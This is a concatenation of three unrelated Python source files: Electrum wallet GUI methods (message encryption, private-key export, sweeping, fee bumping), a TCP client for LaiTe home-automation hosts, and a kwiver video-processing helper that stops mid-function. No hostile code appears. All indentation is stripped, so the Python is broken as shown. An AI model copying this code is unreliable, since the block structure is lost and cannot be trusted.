message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
YouJiaClient.py
|
"""
Copyright 2019 Vincent Qiu
Email: nov30th@gmail.com
Description:
莱特 LaiTe Devices (laitecn) Host Connection Manager
Notice:
"""
import logging
import queue
import socket
import threading
import time
from typing import List, Dict
_LOGGER = logging.getLogger(__name__)
RETRY_SECS = 3
YOUJIA_HOSTS = {} # type: Dict[str,YouJiaClient]
DEFAULT_SOCKET_OPTION = [(socket.SOL_TCP, socket.TCP_NODELAY, 1), ]
if hasattr(socket, "SO_KEEPALIVE"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1))
if hasattr(socket, "TCP_KEEPIDLE"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_TCP, socket.TCP_KEEPIDLE, 1))
if hasattr(socket, "TCP_KEEPINTVL"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_TCP, socket.TCP_KEEPINTVL, 1))
if hasattr(socket, "TCP_KEEPCNT"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_TCP, socket.TCP_KEEPCNT, 5))
class YouJiaClient:
def __init__(self,
host_name: str,
host: str,
port: int,
device_id: str,
username: str,
password: str,
control_delay: float
) -> None:
self._sock = None # type: socket.socket
self._host_name = host_name # type: str
self._host = host # type: str
self._port = port # type: int
self._device_id = device_id.lower() # type: str
self._username = username # type: str
self._password = password # type: str
self._message_hex_receiver = [] # type: List
self._message_str_receiver = [] # type: List
self._is_connected = False
self._control_delay = control_delay # type: float
self.sending_queue = queue.Queue() # type: queue.Queue
self._connection_thread = threading.Thread(target=self.connect_loop)
self._connection_thread.daemon = True
self._sending_str_thread = threading.Thread(target=self.sending_loop)
self._sending_str_thread.daemon = True
# self._keep_alive_thread = threading.Thread(target=self.keep_alive_and_error_detect)
self._connection_thread.start()
self._sending_str_thread.start()
# self._keep_alive_thread.start()
def is_connected(self):
return self._is_connected
# def keep_alive_and_error_detect(self):
# while True:
# time.sleep(5)
# if self._is_connected:
# try:
# _LOGGER.warn("KEEP ALIVE.......SENDING")
# self._sock.sendall(bytes([0x00, 0x01, 0x02, 0xFF]))
# except Exception as e:
# _LOGGER.error(e)
# _LOGGER.error("Keep alive error...")
def sending_loop(self):
while True:
time.sleep(self._control_delay)
item = self.sending_queue.get()
if not self._is_connected:
self.sending_queue.empty()
time.sleep(3)
continue
_LOGGER.debug("Sending command %s", ''.join('{:02x}'.format(x) for x in item))
self._sock.sendall(item)
def connect_loop(self):
server_address = (self._host, self._port)
_LOGGER.debug('connecting to {} port {}'.format(*server_address))
while True:
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for name, value, value2 in DEFAULT_SOCKET_OPTION:
sock.setsockopt(name, value, value2)
self._sock = sock
sock.connect(server_address)
self._is_connected = True
_LOGGER.info('connected to {} port {}'.format(*server_address))
break
except Exception as e:
self._is_connected = False
_LOGGER.error(e)
_LOGGER.error("You Jia host %s failed!", self._host_name)
_LOGGER.error("Can not connect to YouJia host, %s%s", self._host, self._port)
_LOGGER.error("Retry after %s secs...", RETRY_SECS)
time.sleep(RETRY_SECS)
try:
# Send data
sock.sendall(bytes([0xFF, 0xFF, 0xFF, 0xFF]))
while True:
data = sock.recv(512)
_LOGGER.debug('received {!r}'.format(data))
self.handle_receivers(data)
except Exception as e:
self._is_connected = False
_LOGGER.error(e)
_LOGGER.error("Host %s Connection has been closed, reconnecting...", self._host_name)
sock.close()
time.sleep(RETRY_SECS)
def handle_receivers(self, data):
if len(self._message_str_receiver) > 0:
str_message = ''.join('{:02x}'.format(x) for x in data) # str(binascii.hexlify(bytearray(data)))
_LOGGER.warn("Handle string message %s", str_message)
for receiver in self._message_str_receiver:
try:
receiver(str_message)
except Exception as e:
_LOGGER.fatal(e)
for receiver in self._message_hex_receiver:
receiver(data)
def add_hex_receiver(self, client_hex_receiver):
self._message_hex_receiver.append(client_hex_receiver)
def add_str_receiver(self, client_str_receiver):
self._message_str_receiver.append(client_str_receiver)
def send_str_command(self, message: str) -> None:
if self._sock is not None and self._is_connected:
message = self._device_id + 'CDB8B4AB' + message
_LOGGER.warn("sending bytes to host {}".format(message))
self.sending_queue.put(bytes.fromhex(message))
else:
_LOGGER.error("Can not send commands as host %s is not connected", self._host_name)
# def send_hex_command(self, message: bytes) -> None:
# if self._sock is not None and self._is_connected:
# self._sock.sendall(message)
# else:
# _LOGGER.error("Can not send commands as host %s is not connected", self._host_name)
def get_host(host_name: str) -> YouJiaClient:
return YOUJIA_HOSTS[host_name]
|
process_video.py
|
#!/usr/bin/env python
import sys
import os
import shutil
import math
import numpy as np
import argparse
import contextlib
import itertools
import signal
import subprocess
import tempfile
import threading
try:
import queue # Python 3
except ImportError:
import Queue as queue # Python 2
sys.dont_write_bytecode = True
import database_tool
# Character short-cuts and global constants
if os.name == 'nt':
div = '\\'
else:
div = '/'
lb = '\n'
lb1 = lb
lb2 = lb * 2
lb3 = lb * 3
detection_ext = "_detections.csv"
track_ext = "_tracks.csv"
default_pipeline = "pipelines" + div + "index_default.pipe"
no_pipeline = "none"
# Global flag to see if any video has successfully completed processing
any_video_complete = False
# Helper class to list files with a given extension in a directory
def list_files_in_dir( folder ):
if not os.path.exists( folder ) and os.path.exists( folder + ".lnk" ):
folder = folder + ".lnk"
folder = folder if not os.path.islink( folder ) else os.readlink( folder )
if not os.path.isdir( folder ):
exit_with_error( "Input folder \"" + folder + "\" does not exist" )
return [
os.path.join( folder, f ) for f in sorted( os.listdir( folder ) )
if not f.startswith('.')
]
def list_files_in_dir_w_ext( folder, extension ):
return [ f for f in list_files_in_dir( folder ) if f.endswith( extension ) ]
def has_valid_ext( f, ext_list ):
for ext in ext_list:
if f.lower().endswith( ext ):
return True
return False
def has_file_with_extension( folder, extension ):
for filename in list_files_in_dir_w_ext( folder, extension ):
if filename.endswith( extension ):
return True
return False
def list_files_in_dir_w_exts( folder, extensions ):
ext_list = extensions.split(";")
return [ f for f in list_files_in_dir( folder ) if has_valid_ext( f, ext_list ) ]
def list_videos_in_dir( folder, extensions ):
files = list_files_in_dir_w_exts( folder, extensions )
if len( files ) == 0:
files = [ f for f in list_files_in_dir( folder ) if os.path.isdir( f ) ]
if len( files ) == 0:
files = list_files_in_dir( folder )
return files
# Default message logging
def log_info( msg ):
sys.stdout.write( msg )
sys.stdout.flush()
# Create a directory if it doesn't exist
def create_dir( dirname, logging=True, recreate=False, prompt=True ):
if dirname == '.' or dirname == "":
return
if recreate:
if os.path.exists( dirname ):
if not prompt or database_tool.query_yes_no( lb1 + "Reset folder: " + dirname + "?" ):
if logging:
log_info( "Removing " + dirname + lb )
shutil.rmtree( dirname )
elif prompt:
sys.exit(0)
else:
log_info( lb )
if not os.path.exists( dirname ):
if logging:
log_info( "Creating " + dirname + lb )
os.makedirs( dirname )
CUDA_VISIBLE_DEVICES = "CUDA_VISIBLE_DEVICES"
def get_real_gpu_index(n):
"""Return the real index for the nth GPU as a string. This respects
CUDA_VISIBLE_DEVICES
"""
cvd = os.environ.get( CUDA_VISIBLE_DEVICES )
if not cvd: # Treat empty string and None the same
return str(n)
# This is an attempt to respect the fact that an invalid index hides
# the GPUs listed after it
cvd_parsed = list( itertools.takewhile( lambda i: not i.startswith('-'),
cvd.split(',') ) )
if 0 <= n < len( cvd_parsed ):
return cvd_parsed[n]
else:
raise IndexError('Only {} visible GPUs; you asked for number {}!'
.format( len( cvd_parsed ), n) )
def execute_command( cmd, stdout=None, stderr=None, gpu=None ):
if gpu is None:
env = None
else:
env = dict(os.environ)
env[ CUDA_VISIBLE_DEVICES ] = get_real_gpu_index( gpu )
return subprocess.call( cmd, stdout=stdout, stderr=stderr, env=env )
def get_script_path():
return os.path.dirname( os.path.realpath( sys.argv[0] ) )
def get_pipeline_cmd( debug=False ):
if os.name == 'nt':
if debug:
return [ 'kwiver.exe', 'runner' ]
else:
return [ 'kwiver.exe', 'runner' ]
else:
if debug:
return [ 'gdb', '--args', 'kwiver', 'runner' ]
else:
return [ 'kwiver', 'runner' ]
def exit_with_error( error_str, force=False ):
log_info( lb1 + 'ERROR: ' + error_str + lb2 )
# Kill this process to end all threads
if not isinstance( threading.current_thread(), threading._MainThread ):
if os.name == 'nt':
os.kill( os.getpid(), signal.SIGTERM )
else:
os.kill( os.getpid(), signal.SIGKILL )
# Default exit case, if main thread
sys.exit(0)
def check_file( filename ):
if not os.path.exists( filename ):
exit_with_error( "Unable to find: " + filename )
return filename
@contextlib.contextmanager
def get_log_output_files( output_prefix ):
if os.name == 'nt':
with open( output_prefix + '.out.txt', 'w' ) as fo, \
open( output_prefix + '.err.txt', 'w' ) as fe:
yield dict( stdout=fo, stderr=fe)
else:
with open( output_prefix + '.txt', 'w' ) as fo:
yield dict( stdout=fo, stderr=fo )
def find_file( filename ):
if( os.path.exists( filename ) ):
return filename
elif os.path.exists( get_script_path() + div + filename ):
return get_script_path() + div + filename
else:
exit_with_error( "Unable to find " + filename )
def make_filelist_for_dir( input_dir, output_dir, output_name ):
# The most common extension in the folder is most likely images.
# Sometimes people have small text files alongside the images
# so just choose the most common filetype.
exts = dict()
files = dict()
for f in sorted( os.listdir( input_dir ) ):
f_fp = os.path.join( input_dir, f )
if os.path.isfile( f_fp ):
_, ext = os.path.splitext( f )
if ext in exts:
exts[ext] += 1
files[ext].append( f_fp )
else:
exts[ext] = 1
files[ext] = [ f_fp ]
if len(exts) == 0:
return ""
top_ext = sorted( exts, key=exts.get, reverse=True )[0]
# Write out list to file
output_file = os.path.join( output_dir, output_name + ".txt" )
fout = open( output_file, "w" )
for f in files[top_ext]:
fout.write( os.path.abspath( f + lb1 ) )
fout.close()
return output_file
# Other helpers
def signal_handler( signal, frame ):
log_info( lb1 )
exit_with_error( 'Processing aborted, see you next time' )
def file_length( filename ):
if not os.path.exists( filename ):
exit_with_error( filename + " does not exist" )
with open( filename, 'r' ) as f:
for i, l in enumerate( f ):
pass
return i + 1
def split_image_list( image_list_file, n, dir ):
"""Create and return the paths to n temp files that when appended
reproduce the original file. The names are created
deterministically like "orig_name_part0.ext", "orig_name_part1.ext",
etc., but with the original name used as is when n == 1.
Existing files with the same names are overwritten without question.
Deleting the files is the responsibility of the caller.
"""
input_basename = os.path.basename( image_list_file )
if n == 1:
new_file_names = [ input_basename ]
else:
prefix, suffix = os.path.splitext( input_basename )
num_width = len( str( n - 1 ) )
new_file_names = [
prefix + '_part{:0{}}'.format( i, num_width ) + suffix
for i in range( n )
]
new_file_names = [ os.path.join( dir, fn ) for fn in new_file_names ]
try:
# Build manually to have the intermediate state in case of error
temp_files = []
divisor = math.floor( file_length( image_list_file ) / n ) + 1
for fn in new_file_names:
temp_files.append( open( fn, 'w' ) )
with open( image_list_file ) as f:
for i, line in enumerate( f ):
temp_index = int( math.floor( i / divisor ) )
temp_files[ temp_index ].write( line )
finally:
for f in temp_files:
f.close()
return new_file_names
def fset( setting_str ):
return ['-s', setting_str]
def video_output_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'detector_writer:stream_identifier=' + basename ),
fset( 'track_writer:file_name=' + output_dir + div + basename + track_ext ),
fset( 'track_writer:stream_identifier=' + basename ),
fset( 'track_writer_db:writer:db:video_name=' + basename ),
fset( 'track_writer_kw18:file_name=' + output_dir + div + basename + '.kw18' ),
fset( 'descriptor_writer_db:writer:db:video_name=' + basename ),
fset( 'track_descriptor:uid_basename=' + basename ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
def plot_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
def archive_dimension_settings_list( options ):
